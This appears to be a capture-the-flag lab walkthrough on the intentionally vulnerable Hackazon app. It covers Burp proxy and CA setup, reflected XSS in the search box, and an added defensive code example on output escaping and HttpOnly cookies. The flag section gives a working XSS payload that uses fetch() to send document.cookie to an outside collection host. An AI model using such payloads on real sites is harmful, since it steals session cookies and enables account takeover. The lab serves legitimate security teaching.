On the Options sub-tab, make sure the proxy is listening on 127.0.0.1:8080 as shown below.
In Preferences, search for proxy. Click the Settings... button.
Configure Firefox to use the 127.0.0.1 proxy on port 8080 for all protocols, as shown below.
On the "HTTP history" sub-tab, you should see a request to http://ad.samsclass.info, as shown below.
At the top right, click "CA Certificate", as shown below.
Save the certificate in your Downloads folder.
In the Certificate Manager box, click the Import... button.
Navigate to the certificate you downloaded, as shown below, and double-click it.
A box pops up, as shown below. Click "Trust this CA to verify websites" and click OK.
In the Certificate Manager box, click OK.
On the "HTTP history" sub-tab, you should see an HTTPS request. Click it.
In the lower pane, on the Request tab, on the Params sub-tab, you should see a PHPSESSID cookie value, as shown below.
No results are found, but the query "shoes" appears in the results page, as shown below.
When data from the user is echoed back on a Web page without being sanitized, it can contain scripts, causing a reflected XSS vulnerability.
An alert box pops up, as shown below.
Note: some browsers block such injections. When I did this on a Mac on Feb 6, 2020, the pop-up appeared in Brave, Opera, Firefox, and Chrome, but not in Safari.
An alert box pops up, showing cookie values, as shown below.
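The fix for the echo described above, as an added example that is not part of the original lab and is not Hackazon's code: the same search-results message rendered unsafely and with HTML output encoding, plus a session cookie header marked HttpOnly so page scripts cannot read it through document.cookie. All function names, the sample query and the sample session id are constructed for illustration.

```javascript
// Added example (not Hackazon's code): the search-results echo, unsafe and escaped.
// Function names and sample values are hypothetical, constructed for illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the query is concatenated into the page as markup.
function renderResultsUnsafe(query) {
  return `<p>No results found for: ${query}</p>`;
}

// Hardened pattern: the query is encoded for the HTML context it lands in.
function renderResultsSafe(query) {
  return `<p>No results found for: ${escapeHtml(query)}</p>`;
}

// Session cookie header with HttpOnly, so document.cookie does not expose it
// to injected scripts. Secure and SameSite restrict when the browser sends it.
function sessionCookieHeader(sessionId) {
  if (!/^[A-Za-z0-9,-]+$/.test(sessionId)) {
    throw new Error('unexpected characters in session id');
  }
  return `Set-Cookie: PHPSESSID=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// True if the rendered page would contain a live <script> element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

const sampleQuery = '<script>alert(1)</script>'; // constructed input
console.log(renderResultsUnsafe(sampleQuery));   // script tag reaches the page intact
console.log(renderResultsSafe(sampleQuery));     // script tag is shown as text
console.log(sessionCookieHeader('abc123'));      // constructed session id
```

Output encoding removes the injection point; HttpOnly limits what a script can take if another injection point remains.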
At the top left, click the red HACKAZON logo to return to the home page.
Click a product to view it, as shown below.
Flag M 230.1: Stealing Cookies (10 pts)
In the Hackazon page, search for
<script>fetch("https://attack32.samsclass.info/dataview.php?data=" + document.cookie);</script>
In a browser, go to:
Your stolen cookie appears at the end of the list.
The flag is covered by a green box in the image below.
Capturing a Screen Image
Capture a WHOLE-DESKTOP image of Firefox showing the flag.
Save the image as "Proj W 230.1 from YOUR NAME".